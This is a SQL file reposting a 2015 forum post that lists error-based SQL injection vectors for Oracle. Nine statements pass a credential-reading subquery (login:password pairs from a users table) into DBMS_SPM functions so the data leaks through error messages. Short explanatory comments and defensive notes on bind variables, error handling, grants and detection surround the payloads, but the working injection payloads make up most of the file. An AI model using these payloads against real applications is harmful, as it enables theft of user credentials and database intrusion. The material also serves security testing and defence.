-- Error-based SQL Injection vectors in Oracle using dbms_spm.* functions
-- Forum repost by Nytro, April 3, 2015.
-- Original: posted by dsrbr at 9:48 AM. Source: http://dsrbr.blogspot.ru/
--
-- Testing tables: the statements reference news(id, ...) and
-- users(id, login, pass); their definitions are not included on this page.
--
-- How to read the statements
--   * Everything after "id = 1" is the part that would arrive through an
--     attacker-controlled id value when the application builds the statement
--     by string concatenation.
--   * The scalar subquery is passed as an argument to a DBMS_SPM (SQL plan
--     management) function. Per the page title the technique is error-based:
--     the data becomes visible only if the application returns the database
--     error text to the client (exact error wording is not shown here).
--   * "IS NOT NULL" only turns the function call into a valid predicate.
--   * chr(58) is ':' and chr(44) is ','; building delimiters with chr()
--     keeps quote characters out of the injected text.
--   * stragg is not a documented Oracle built-in; presumably a string
--     aggregate available in the author's test schema.
--
-- Defensive notes
--   * Pass id as a bind variable; none of these predicates can be appended
--     to a parameterised statement.
--   * Return a generic error to the client and keep ORA-/PL/SQL error text
--     in server-side logs only.
--   * A web application's query account normally has no reason to call
--     DBMS_SPM; review its effective EXECUTE grants (including PUBLIC).
--   * Detection: "dbms_spm." or chr()/|| chains in request parameters, and
--     DBMS_SPM errors logged for the application account.
--   * If users.pass holds plaintext, one successful read discloses working
--     credentials; a salted, slow password hash limits that impact.

-- Variants that aggregate every users row into one string (stragg)

SELECT *
FROM news
WHERE id = 1
  AND dbms_spm.alter_sql_plan_baseline(
          (SELECT stragg(login || chr(58) || pass || chr(44)) FROM users),
          1,
          1,
          1
      ) IS NOT NULL;

SELECT *
FROM news
WHERE id = 1
  AND dbms_spm.create_evolve_task(
          (SELECT stragg(login || chr(58) || pass || chr(44)) FROM users)
      ) IS NOT NULL;

SELECT *
FROM news
WHERE id = 1
  AND dbms_spm.drop_sql_plan_baseline(
          (SELECT stragg(login || chr(58) || pass || chr(44)) FROM users)
      ) IS NOT NULL;

SELECT *
FROM news
WHERE id = 1
  AND dbms_spm.evolve_sql_plan_baseline(
          (SELECT stragg(login || chr(58) || pass || chr(44)) FROM users)
      ) IS NOT NULL;

-- Variants that read a single users row (id = 1)

SELECT *
FROM news
WHERE id = 1
  AND dbms_spm.implement_evolve_task(
          (SELECT login || chr(58) || pass FROM users WHERE id = 1)
      ) IS NOT NULL;

SELECT *
FROM news
WHERE id = 1
  AND dbms_spm.load_plans_from_sqlset(
          1,
          (SELECT login || chr(58) || pass FROM users WHERE id = 1),
          1
      ) IS NOT NULL;

SELECT *
FROM news
WHERE id = 1
  AND dbms_spm.migrate_stored_outline(
          (SELECT login || chr(58) || pass FROM users WHERE id = 1)
      ) IS NOT NULL;

-- Aggregated form again; the subquery is the fifth argument here

SELECT *
FROM news
WHERE id = 1
  AND dbms_spm.report_auto_evolve_task(
          1,
          1,
          1,
          1,
          (SELECT stragg(login || chr(58) || pass || chr(44)) FROM users)
      ) IS NOT NULL;

-- Single-row form

SELECT *
FROM news
WHERE id = 1
  AND dbms_spm.report_evolve_task(
          (SELECT login || chr(58) || pass FROM users WHERE id = 1)
      ) IS NOT NULL;